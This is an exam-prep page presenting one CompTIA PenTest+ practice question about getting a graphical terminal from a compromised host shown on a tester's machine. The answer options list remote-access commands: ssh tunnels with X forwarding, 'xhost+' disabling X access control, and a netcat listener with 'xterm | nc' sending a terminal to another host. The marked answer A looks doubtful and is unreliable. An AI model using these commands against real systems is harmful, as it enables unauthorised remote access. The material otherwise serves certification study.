CertyRush
Đang tải...
C CertyRush
Câu hỏi free preview

Câu 20: PT0-001: CompTIA PenTest+ Certification Exam

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

Nội dung câu hỏi

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?

Các lựa chọn

Đáp án được giữ gọn theo nhãn A, B, C, D trong phần bình chọn tương tác.

  1. A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal — đáp án hiện tại
  2. B. From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X [email protected] xterm
  3. C. From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 [email protected] ג€xhost+; xtermג€
  4. D. From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000

Cộng đồng

0 bình luận công khai. Tên thành viên được ẩn một phần.

Chưa có bình luận. Mở giao diện tương tác để bắt đầu thảo luận.

Câu hỏi liền kề